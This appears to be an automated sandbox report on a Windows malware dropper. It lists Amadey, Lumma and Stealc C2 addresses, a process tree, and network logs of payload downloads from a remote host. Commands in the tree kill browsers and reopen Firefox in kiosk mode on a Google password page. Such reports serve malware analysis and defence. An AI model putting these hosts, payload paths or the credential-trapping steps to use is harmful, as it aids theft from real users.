Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/12/2024, 18:35 UTC

General

  • Target

    ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe

  • Size

    3.1MB

  • MD5

    2b3dca9f3f8f7b379021a041b731aed3

  • SHA1

    e8fc7d977c0a76e25b1e69f4398a10fef83918d0

  • SHA256

    ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24

  • SHA512

    ce65473353253347788ed1d0641a6c6a3be815c50bd1046c1aa8bf827f48c0f09b61560f3aa3eeb8f641afa6d7a870dd68834615b3fe81b6f62a9ffee946f98a

  • SSDEEP

    49152:QGzTfwucejjjsjgACxGnlEaX+IWYxR8SJe2cC9/1+F0U:Bzb20jIjgACxNyWCR8S42cC9/1+z

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

  • rc4.plain

    1  006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 23 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses the powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe
    "C:\Users\Admin\AppData\Local\Temp\ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe
        "C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:904
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 616
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2164
      • C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe
        "C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4900
      • C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe
        "C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe"
        3⤵
        • Executes dropped EXE
        PID:2068
      • C:\Users\Admin\AppData\Local\Temp\1013239001\ntRoEwh.exe
        "C:\Users\Admin\AppData\Local\Temp\1013239001\ntRoEwh.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:1964
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1592
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 616
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2532
      • C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe
        "C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1152
      • C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe
        "C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3396
      • C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe
        "C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3128
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3676
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4108
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4624
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1288
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          PID:2112
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1864
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.0.625787387\785017775" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1148 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {43c1f451-3d88-4d13-bc6e-5b254a4b4fa3} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 1280 110cd858 gpu
              6⤵
              PID:3316
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.1.1882327981\1688474253" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b727aff5-c87e-4bdf-8c4d-afba28885480} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 1480 f9f9258 socket
              6⤵
              PID:3664
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.2.1325577127\298489421" -childID 1 -isForBrowser -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fc3d986-3753-483f-b035-36ccd3007353} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 2044 19cb4258 tab
              6⤵
              PID:2820
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.3.561170250\294802173" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {264e13ab-a1fc-4b9e-8126-4d21a4b8208e} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 2924 e62758 tab
              6⤵
              PID:4528
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.4.1027251155\693535121" -childID 3 -isForBrowser -prefsHandle 3732 -prefMapHandle 3736 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {44397423-8b64-4184-beec-32b36990a936} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3380 1cdb0358 tab
              6⤵
              PID:1524
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.5.790233875\2115098238" -childID 4 -isForBrowser -prefsHandle 3840 -prefMapHandle 3844 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88068e53-bb73-4586-921c-84cdef532381} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3828 204c6b58 tab
              6⤵
              PID:2576
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1864.6.551785299\404286569" -childID 5 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90d84606-e499-4f64-99d3-bcddeda0ed18} 1864 "\\.\pipe\gecko-crash-server-pipe.1864" 3996 204c6258 tab
              6⤵
              PID:272
      • C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe
        "C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Windows security modification
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:684
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1013248041\KeaEfrP.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4920

Network

                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 4
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:35:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 156
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:35:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    POST
                    http://185.215.113.43/Zu7JuNko/index.php
                    skotes.exe
                    Remote address:
                    185.215.113.43:80
                    Request
                    POST /Zu7JuNko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.43
                    Content-Length: 31
                    Cache-Control: no-cache
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                  • flag-ru
                    GET
                    http://31.41.244.11/files/6554834407/B3vKvPi.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/6554834407/B3vKvPi.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:35:21 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2343424
                    Last-Modified: Sun, 08 Dec 2024 16:02:55 GMT
                    Connection: keep-alive
                    ETag: "6755c32f-23c200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/806475321/0tClIDb.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/806475321/0tClIDb.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:06 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1892352
                    Last-Modified: Sun, 08 Dec 2024 16:55:07 GMT
                    Connection: keep-alive
                    ETag: "6755cf6b-1ce000"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/7658082748/wTMEVe8.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/7658082748/wTMEVe8.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:15 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 4122624
                    Last-Modified: Sun, 08 Dec 2024 17:35:35 GMT
                    Connection: keep-alive
                    ETag: "6755d8e7-3ee800"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/6554834407/ntRoEwh.exe
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/6554834407/ntRoEwh.exe HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:27 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2343424
                    Last-Modified: Sun, 08 Dec 2024 17:50:38 GMT
                    Connection: keep-alive
                    ETag: "6755dc6e-23c200"
                    Accept-Ranges: bytes
                  • flag-ru
                    GET
                    http://31.41.244.11/files/5131681669/KeaEfrP.ps1
                    skotes.exe
                    Remote address:
                    31.41.244.11:80
                    Request
                    GET /files/5131681669/KeaEfrP.ps1 HTTP/1.1
                    Host: 31.41.244.11
                    Response
                    HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Sun, 08 Dec 2024 18:36:51 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 2687
                    Last-Modified: Sun, 08 Dec 2024 18:34:47 GMT
                    Connection: keep-alive
                    ETag: "6755e6c7-a7f"
                    Accept-Ranges: bytes
                  • flag-us
                    DNS
                    atten-supporse.biz
                    78c83a40ec.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    atten-supporse.biz
                    IN A
                    Response
                    atten-supporse.biz
                    IN A
                    104.21.16.9
                    atten-supporse.biz
                    IN A
                    172.67.165.166
                  • flag-us
                    POST
                    https://atten-supporse.biz/api
                    0tClIDb.exe
                    Remote address:
                    104.21.16.9:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: atten-supporse.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=2p5b0sligbovtcopjt1upqiotp; expires=Thu, 03-Apr-2025 12:22:52 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDonfhQaqHtbAgea9S0xdc7ENtclC%2BAE7FaI6uhUg95uGZjwc4%2BnWddEtuwDdrNxDyIEqdsmcyz7rZAMQpTbq6evNXc0A7hOa2MWeb5%2FcQXX5YVEDDtJOSemnrOzTCiV%2BdQgE2w%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc1b0de1ef19-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=64265&min_rtt=55529&rtt_var=23235&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=53329&cwnd=248&unsent_bytes=0&cid=3aac789eed6d04c6&ts=283&x=0"
                  • [US] DNS se-blurry.biz (78c83a40ec.exe), remote address 8.8.8.8:53
                    Request
                    se-blurry.biz
                    IN A
                    Response
                    se-blurry.biz
                    IN A
                    172.67.162.65
                    se-blurry.biz
                    IN A
                    104.21.81.153
                  • [US] POST https://se-blurry.biz/api (0tClIDb.exe), remote address 172.67.162.65:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: se-blurry.biz
                    Response
                    HTTP/1.1 200 OK
                    Date: Sun, 08 Dec 2024 18:36:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Set-Cookie: PHPSESSID=2gmvlh6ugqaatcop55qhqn0784; expires=Thu, 03-Apr-2025 12:22:53 GMT; Max-Age=9999999; path=/
                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                    Cache-Control: no-store, no-cache, must-revalidate
                    Pragma: no-cache
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWFPYGNVUuFOQN8Dyf3CN217RxnIajd7QHjmVqrEZx2vORNiGWz1tFm9bQqnAn4rK8b2%2FpP%2F70wTc%2FVSiCHTJ6VzVpZFyk%2BhB151JdZdZ6pH2cq1kvsREBe9XFJAe8m6"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8eeedc1d7c56950b-LHR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=53990&min_rtt=47690&rtt_var=13471&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=581&delivery_rate=73139&cwnd=246&unsent_bytes=0&cid=1ad28a414aac9d1a&ts=268&x=0"
                  • [US] DNS zinc-sneark.biz (78c83a40ec.exe), remote address 8.8.8.8:53
                    Request
                    zinc-sneark.biz
                    IN A
                    Response
                    zinc-sneark.biz
                    IN A
                    104.21.62.142
                    zinc-sneark.biz
                    IN A
                    172.67.136.167
                  • [US] POST https://zinc-sneark.biz/api (0tClIDb.exe), remote address 104.21.62.142:443
                    Request
                    POST /api HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                    Content-Length: 8
                    Host: zinc-sneark.biz
                    Response
                    HTTP/1.1 403 Forbidden
                    Date: Sun, 08 Dec 2024 18:36:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Frame-Options: SAMEORIGIN
